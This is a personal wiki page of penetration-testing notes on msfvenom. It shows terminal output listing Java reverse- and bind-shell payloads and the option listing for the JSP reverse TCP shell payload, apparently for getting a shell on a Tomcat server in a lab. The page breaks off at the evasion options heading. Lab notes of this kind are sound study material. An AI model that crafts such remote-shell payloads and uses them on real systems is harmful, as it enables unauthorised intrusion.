MSFVenom
From charlesreid1
Can be used to craft payloads like remote tcp shells.
See this tool in action: Metasploitable/Apache/DAV
Creating Payloads
Tomcat
To create a WAR file that woudl give a reverse shell, I used msfvenom to generate the payload.
Started by listing all the different payloads available, so I could look for java-related payloads:
root@morpheus:~/box/besside# msfvenom -l payloads
Framework Payloads (437 total)
==============================
Name Description
---- -----------
java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection
java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP
java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS
java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager
java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
java/shell_reverse_tcp Connect back to attacker and spawn a command shell
Probably want to use java/jsp_shell_reverse_tcp or java/meterpreter/reverse_tcp.
jsp shell reverse tcp
Here are the options:
root@morpheus:~/box/besside# msfvenom -p java/jsp_shell_reverse_tcp --payload-options
Options for payload/java/jsp_shell_reverse_tcp:
Name: Java JSP Command Shell, Reverse TCP Inline
Module: payload/java/jsp_shell_reverse_tcp
Platform: Linux, OSX, Solaris, Unix, Windows
Arch: java
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Description:
Connect back to attacker and spawn a command shell
Advanced options for payload/java/jsp_shell_reverse_tcp:
Name : AutoRunScript
Current Setting:
Description : A script to run automatically on session creation.
Name : InitialAutoRunScript
Current Setting:
Description : An initial script to run on session creation (before
AutoRunScript)
Name : ReverseAllowProxy
Current Setting: false
Description : Allow reverse tcp even with Proxies specified. Connect back
will NOT go through proxy but directly to LHOST
Name : ReverseConnectRetries
Current Setting: 5
Description : The number of connection attempts to try before exiting the
process
Name : ReverseListenerBindAddress
Current Setting:
Description : The specific IP address to bind to on the local system
Name : ReverseListenerBindPort
Current Setting:
Description : The port to bind to on the local system if different from LPORT
Name : ReverseListenerComm
Current Setting:
Description : The specific communication channel to use for this listener
Name : ReverseListenerThreaded
Current Setting: false
Description : Handle every connection in a new thread (experimental)
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
Evasion options for payload/java/jsp_shell_reverse_tcp: